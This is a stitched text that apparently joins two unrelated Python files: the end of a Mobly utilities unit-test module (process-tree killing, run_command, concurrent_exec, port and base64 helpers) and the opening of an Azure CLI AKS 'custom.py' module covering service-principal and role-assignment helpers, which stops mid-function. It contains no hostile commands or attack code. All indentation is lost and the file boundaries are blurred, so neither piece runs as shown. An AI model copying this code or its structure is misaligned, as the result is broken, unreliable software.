# os.kill throws OSError if the process with PID pid is not running.
# signal.SIG_DFL is one of two standard signal handling options, it will
# simply perform the default function for the signal.
os.kill(pid, signal.SIG_DFL)
except OSError:
return False
return True
def _fork_children_processes(name, successors):
"""Forks children processes and its descendants recursively.
Args:
name: The name of this process.
successors: The args for the descendant processes.
"""
logging.info('Process "%s" started, PID: %d!', name, os.getpid())
children_process = [
multiprocessing.Process(target=_fork_children_processes, args=args)
for args in successors
]
for child_process in children_process:
child_process.start()
if 'child' in name:
time.sleep(4)
for child_process in children_process:
child_process.join()
logging.info('Process "%s" exit.', name)
class UtilsTest(unittest.TestCase):
"""Unit tests for the implementation of everything under mobly.utils."""
def setUp(self):
super().setUp()
self.tmp_dir = tempfile.mkdtemp()
def tearDown(self):
super().tearDown()
shutil.rmtree(self.tmp_dir)
def sleep_cmd(self, wait_secs):
if platform.system() == 'Windows':
python_code = ['import time', 'time.sleep(%s)' % wait_secs]
return ['python', '-c', 'exec("%s")' % r'\r\n'.join(python_code)]
else:
return ['sleep', str(wait_secs)]
@unittest.skipIf(os.name == "nt",
'collect_process_tree only available on Unix like system.')
@mock.patch('subprocess.check_output')
def test_collect_process_tree_without_child(self, mock_check_output):
mock_check_output.side_effect = (subprocess.CalledProcessError(
-1, 'fake_cmd'))
pid_list = utils._collect_process_tree(123)
self.assertListEqual(pid_list, [])
@unittest.skipIf(os.name == "nt",
'collect_process_tree only available on Unix like system.')
@mock.patch('subprocess.check_output')
def test_collect_process_tree_returns_list(self, mock_check_output):
# Creates subprocess 777 with descendants looks like:
# subprocess 777
# ├─ 780 (child)
# │ ├─ 888 (grandchild)
# │ │ ├─ 913 (great grandchild)
# │ │ └─ 999 (great grandchild)
# │ └─ 890 (grandchild)
# ├─ 791 (child)
# └─ 799 (child)
mock_check_output.side_effect = (
# ps -o pid --ppid 777 --noheaders
b'780\n 791\n 799\n',
# ps -o pid --ppid 780 --noheaders
b'888\n 890\n',
# ps -o pid --ppid 791 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 799 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 888 --noheaders
b'913\n 999\n',
# ps -o pid --ppid 890 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 913 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 999 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
)
pid_list = utils._collect_process_tree(777)
self.assertListEqual(pid_list, [780, 791, 799, 888, 890, 913, 999])
@mock.patch.object(os, 'kill')
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_succeeds(self, mock_collect_process_tree,
mock_os_kill):
mock_collect_process_tree.return_value = [799, 888, 890]
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='posix'):
utils._kill_process_tree(mock_proc)
mock_os_kill.assert_has_calls([
mock.call(799, signal.SIGTERM),
mock.call(888, signal.SIGTERM),
mock.call(890, signal.SIGTERM),
])
mock_proc.kill.assert_called_once()
@mock.patch.object(os, 'kill')
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_kill_children_failed_throws_error(
self, mock_collect_process_tree, mock_os_kill):
mock_collect_process_tree.return_value = [799, 888, 890]
mock_os_kill.side_effect = [None, OSError(), None]
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='posix'):
with self.assertRaises(utils.Error):
utils._kill_process_tree(mock_proc)
mock_proc.kill.assert_called_once()
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_kill_proc_failed_throws_error(
self, mock_collect_process_tree):
mock_collect_process_tree.return_value = []
mock_proc = mock.MagicMock()
mock_proc.pid = 123
mock_proc.kill.side_effect = subprocess.SubprocessError()
with mock.patch.object(os, 'name', new='posix'):
with self.assertRaises(utils.Error):
utils._kill_process_tree(mock_proc)
mock_proc.kill.assert_called_once()
@mock.patch('subprocess.check_output')
def test_kill_process_tree_on_windows_calls_taskkill(self, mock_check_output):
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='nt'):
utils._kill_process_tree(mock_proc)
mock_check_output.assert_called_once_with([
'taskkill',
'/F',
'/T',
'/PID',
'123',
])
def test_run_command(self):
ret, _, _ = utils.run_command(self.sleep_cmd(0.01))
self.assertEqual(ret, 0)
def test_run_command_with_timeout(self):
ret, _, _ = utils.run_command(self.sleep_cmd(0.01), timeout=4)
self.assertEqual(ret, 0)
def test_run_command_with_timeout_expired(self):
with self.assertRaises(subprocess.TimeoutExpired):
_ = utils.run_command(self.sleep_cmd(4), timeout=0.01)
@mock.patch('threading.Timer')
@mock.patch('subprocess.Popen')
def test_run_command_with_default_params(self, mock_popen, mock_timer):
mock_command = mock.MagicMock(spec=dict)
mock_proc = mock_popen.return_value
mock_proc.communicate.return_value = ('fake_out', 'fake_err')
mock_proc.returncode = 0
out = utils.run_command(mock_command)
self.assertEqual(out, (0, 'fake_out', 'fake_err'))
mock_popen.assert_called_with(
mock_command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
cwd=None,
env=None,
universal_newlines=False,
)
mock_timer.assert_not_called()
@mock.patch('threading.Timer')
@mock.patch('subprocess.Popen')
def test_run_command_with_custom_params(self, mock_popen, mock_timer):
mock_command = mock.MagicMock(spec=dict)
mock_stdout = mock.MagicMock(spec=int)
mock_stderr = mock.MagicMock(spec=int)
mock_shell = mock.MagicMock(spec=bool)
mock_timeout = 1234
mock_env = mock.MagicMock(spec=dict)
mock_universal_newlines = mock.MagicMock(spec=bool)
mock_proc = mock_popen.return_value
mock_proc.communicate.return_value = ('fake_out', 'fake_err')
mock_proc.returncode = 127
out = utils.run_command(mock_command,
stdout=mock_stdout,
stderr=mock_stderr,
shell=mock_shell,
timeout=mock_timeout,
env=mock_env,
universal_newlines=mock_universal_newlines)
self.assertEqual(out, (127, 'fake_out', 'fake_err'))
mock_popen.assert_called_with(
mock_command,
stdout=mock_stdout,
stderr=mock_stderr,
shell=mock_shell,
cwd=None,
env=mock_env,
universal_newlines=mock_universal_newlines,
)
mock_timer.assert_called_with(1234, mock.ANY)
def test_run_command_with_universal_newlines_false(self):
_, out, _ = utils.run_command(self.sleep_cmd(0.01),
universal_newlines=False)
self.assertIsInstance(out, bytes)
def test_run_command_with_universal_newlines_true(self):
_, out, _ = utils.run_command(self.sleep_cmd(0.01), universal_newlines=True)
self.assertIsInstance(out, str)
def test_start_standing_subproc(self):
try:
p = utils.start_standing_subprocess(self.sleep_cmd(4))
self.assertTrue(_is_process_running(p.pid))
os.kill(p.pid, signal.SIGTERM)
finally:
p.stdout.close()
p.stderr.close()
p.wait()
@mock.patch('subprocess.Popen')
def test_start_standing_subproc_without_env(self, mock_popen):
utils.start_standing_subprocess(self.sleep_cmd(0.01))
mock_popen.assert_called_with(
self.sleep_cmd(0.01),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
env=None,
)
@mock.patch('subprocess.Popen')
def test_start_standing_subproc_with_custom_env(self, mock_popen):
mock_env = mock.MagicMock(spec=dict)
utils.start_standing_subprocess(self.sleep_cmd(0.01), env=mock_env)
mock_popen.assert_called_with(
self.sleep_cmd(0.01),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
env=mock_env,
)
def test_stop_standing_subproc(self):
p = utils.start_standing_subprocess(self.sleep_cmd(4))
utils.stop_standing_subprocess(p)
self.assertFalse(_is_process_running(p.pid))
def test_stop_standing_subproc_without_pipe(self):
p = subprocess.Popen(self.sleep_cmd(4))
self.assertIsNone(p.stdout)
utils.stop_standing_subprocess(p)
self.assertFalse(_is_process_running(p.pid))
def test_stop_standing_subproc_and_descendants(self):
# Creates subprocess A with descendants looks like:
# subprocess A
# ├─ B (child)
# │ ├─ X (grandchild)
# │ │ ├─ 1 (great grandchild)
# │ │ └─ 2 (great grandchild)
# │ └─ Y (grandchild)
# ├─ C (child)
# └─ D (child)
process_tree_args = ('subprocess_a', [
('child_b', [
('grand_child_x', [
('great_grand_child_1', []),
('great_grand_child_2', []),
]),
('grand_child_y', []),
]),
('child_c', []),
('child_d', []),
])
subprocess_a = multiprocessing.Process(target=_fork_children_processes,
args=process_tree_args)
subprocess_a.start()
mock_subprocess_a_popen = mock.MagicMock()
mock_subprocess_a_popen.pid = subprocess_a.pid
# Sleep a while to create all processes.
time.sleep(0.01)
utils.stop_standing_subprocess(mock_subprocess_a_popen)
subprocess_a.join(timeout=1)
mock_subprocess_a_popen.wait.assert_called_once()
@unittest.skipIf(sys.version_info >= (3, 4) and sys.version_info < (3, 5),
'Python 3.4 does not support `None` max_workers.')
def test_concurrent_exec_when_none_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)], max_workers=None)
thread_pool_spy.assert_called_once_with(max_workers=None)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_default_max_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)])
thread_pool_spy.assert_called_once_with(max_workers=30)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_custom_max_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)], max_workers=1)
thread_pool_spy.assert_called_once_with(max_workers=1)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_makes_all_calls(self):
mock_function = mock.MagicMock()
_ = utils.concurrent_exec(mock_function, [
(1, 1),
(2, 2),
(3, 3),
])
self.assertEqual(mock_function.call_count, 3)
mock_function.assert_has_calls(
[mock.call(1, 1), mock.call(2, 2),
mock.call(3, 3)], any_order=True)
def test_concurrent_exec_generates_results(self):
def adder(a, b):
return a + b
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)])
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_exception_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
])
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('123'),
mock.call('not_int'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_exception_generates_results(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
results = utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
])
self.assertEqual(len(results), 4)
self.assertIn(1, results)
self.assertIn(123, results)
self.assertIn(5435, results)
exceptions = [result for result in results if isinstance(result, Exception)]
self.assertEqual(len(exceptions), 1)
self.assertIsInstance(exceptions[0], ValueError)
def test_concurrent_exec_when_multiple_exceptions_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
])
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('not_int1'),
mock.call('not_int2'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_multiple_exceptions_generates_results(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
results = utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
])
self.assertEqual(len(results), 4)
self.assertIn(1, results)
self.assertIn(5435, results)
exceptions = [result for result in results if isinstance(result, Exception)]
self.assertEqual(len(exceptions), 2)
self.assertIsInstance(exceptions[0], ValueError)
self.assertIsInstance(exceptions[1], ValueError)
self.assertNotEqual(exceptions[0], exceptions[1])
def test_concurrent_exec_when_raising_exception_generates_results(self):
def adder(a, b):
return a + b
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)],
raise_on_exception=True)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_raising_exception_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
with self.assertRaisesRegex(RuntimeError, '.*not_int.*'):
_ = utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
],
raise_on_exception=True)
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('123'),
mock.call('not_int'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_raising_multiple_exceptions_makes_all_calls(
self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
with self.assertRaisesRegex(
RuntimeError,
r'(?m).*(not_int1(.|\s)+not_int2|not_int2(.|\s)+not_int1).*'):
_ = utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
],
raise_on_exception=True)
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('not_int1'),
mock.call('not_int2'),
mock.call(5435),
],
any_order=True)
def test_create_dir(self):
new_path = os.path.join(self.tmp_dir, 'haha')
self.assertFalse(os.path.exists(new_path))
utils.create_dir(new_path)
self.assertTrue(os.path.exists(new_path))
def test_create_dir_already_exists(self):
self.assertTrue(os.path.exists(self.tmp_dir))
utils.create_dir(self.tmp_dir)
self.assertTrue(os.path.exists(self.tmp_dir))
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=True)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
def test_get_available_port_positive(self, *_):
self.assertEqual(utils.get_available_host_port(), MOCK_AVAILABLE_PORT)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=False)
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
def test_get_available_port_positive_no_adb(self,
mock_list_occupied_adb_ports, *_):
self.assertEqual(utils.get_available_host_port(), MOCK_AVAILABLE_PORT)
mock_list_occupied_adb_ports.assert_not_called()
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=True)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports',
return_value=[MOCK_AVAILABLE_PORT])
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
def test_get_available_port_negative(self, *_):
with self.assertRaisesRegex(utils.Error, 'Failed to find.* retries'):
utils.get_available_host_port()
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
def test_get_available_port_returns_free_port(self, _):
"""Verifies logic to pick a free port on the host.
Test checks we can bind to either an ipv4 or ipv6 socket on the port
returned by get_available_host_port.
"""
port = utils.get_available_host_port()
got_socket = False
for family in (socket.AF_INET, socket.AF_INET6):
try:
s = socket.socket(family, socket.SOCK_STREAM)
got_socket = True
break
except socket.error:
continue
self.assertTrue(got_socket)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.bind(('localhost', port))
finally:
s.close()
def test_load_file_to_base64_str_reads_bytes_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'SGVsbG93IHdvcmxkIQ=='
with io.open(tmp_file_path, 'wb') as f:
f.write(b'Hellow world!')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_load_file_to_base64_str_reads_text_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'SGVsbG93IHdvcmxkIQ=='
with io.open(tmp_file_path, 'w', encoding='utf-8') as f:
f.write(u'Hellow world!')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_load_file_to_base64_str_reads_unicode_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'6YCa'
with io.open(tmp_file_path, 'w', encoding='utf-8') as f:
f.write(u'\u901a')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_cli_cmd_to_string(self):
cmd = ['"adb"', 'a b', 'c//']
self.assertEqual(utils.cli_cmd_to_string(cmd), '\'"adb"\' \'a b\' c//')
cmd = 'adb -s meme do something ab_cd'
self.assertEqual(utils.cli_cmd_to_string(cmd), cmd)
def test_get_settable_properties(self):
class SomeClass:
regular_attr = 'regular_attr'
_foo = 'foo'
_bar = 'bar'
@property
def settable_prop(self):
return self._foo
@settable_prop.setter
def settable_prop(self, new_foo):
self._foo = new_foo
@property
def readonly_prop(self):
return self._bar
def func(self):
"""Func should not be considered as a settable prop."""
actual = utils.get_settable_properties(SomeClass)
self.assertEqual(actual, ['settable_prop'])
def test_find_subclasses_in_module_when_one_subclass(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
integration_test)
self.assertEqual(len(subclasses), 1)
self.assertEqual(subclasses[0], integration_test.IntegrationTest)
def test_find_subclasses_in_module_when_indirect_subclass(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
mock_instrumentation_test)
self.assertEqual(len(subclasses), 1)
self.assertEqual(subclasses[0],
mock_instrumentation_test.MockInstrumentationTest)
def test_find_subclasses_in_module_when_no_subclasses(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
mock_controller)
self.assertEqual(len(subclasses), 0)
def test_find_subclasses_in_module_when_multiple_subclasses(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 2)
self.assertIn(multiple_subclasses_module.Subclass1Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Test, subclasses)
def test_find_subclasses_in_module_when_multiple_base_classes(self):
subclasses = utils.find_subclasses_in_module(
[base_test.BaseTestClass, test_runner.TestRunner],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 4)
self.assertIn(multiple_subclasses_module.Subclass1Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass1Runner, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Runner, subclasses)
def test_find_subclasses_in_module_when_only_some_base_classes_present(self):
subclasses = utils.find_subclasses_in_module(
[signals.TestSignal, test_runner.TestRunner],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 2)
self.assertIn(multiple_subclasses_module.Subclass1Runner, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Runner, subclasses)
def test_find_subclass_in_module_when_one_subclass(self):
subclass = utils.find_subclass_in_module(base_test.BaseTestClass,
integration_test)
self.assertEqual(subclass, integration_test.IntegrationTest)
def test_find_subclass_in_module_when_indirect_subclass(self):
subclass = utils.find_subclass_in_module(base_test.BaseTestClass,
mock_instrumentation_test)
self.assertEqual(subclass,
mock_instrumentation_test.MockInstrumentationTest)
def test_find_subclass_in_module_when_no_subclasses(self):
with self.assertRaisesRegex(
ValueError, '.*Expected 1 subclass of BaseTestClass per module, found'
r' \[\].*'):
_ = utils.find_subclass_in_module(base_test.BaseTestClass,
mock_controller)
def test_find_subclass_in_module_when_multiple_subclasses(self):
with self.assertRaisesRegex(
ValueError, '.*Expected 1 subclass of BaseTestClass per module, found'
r' \[(\'Subclass1Test\', \'Subclass2Test\''
r'|\'Subclass2Test\', \'Subclass1Test\')\].*'):
_ = utils.find_subclass_in_module(base_test.BaseTestClass,
multiple_subclasses_module)
if __name__ == '__main__':
unittest.main()
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
from math import isnan
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceLinuxProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterWindowsProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceNetworkProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterServicePrincipalProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceSshConfiguration
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceSshPublicKey
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedCluster
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAADProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAddonProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAgentPoolProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import AgentPool
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceStorageProfileTypes
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterIdentity
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAPIServerAccessProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterSKU
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._helpers import _populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_PREFIX, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_SHARED, CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.mgmt.resource.resources import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
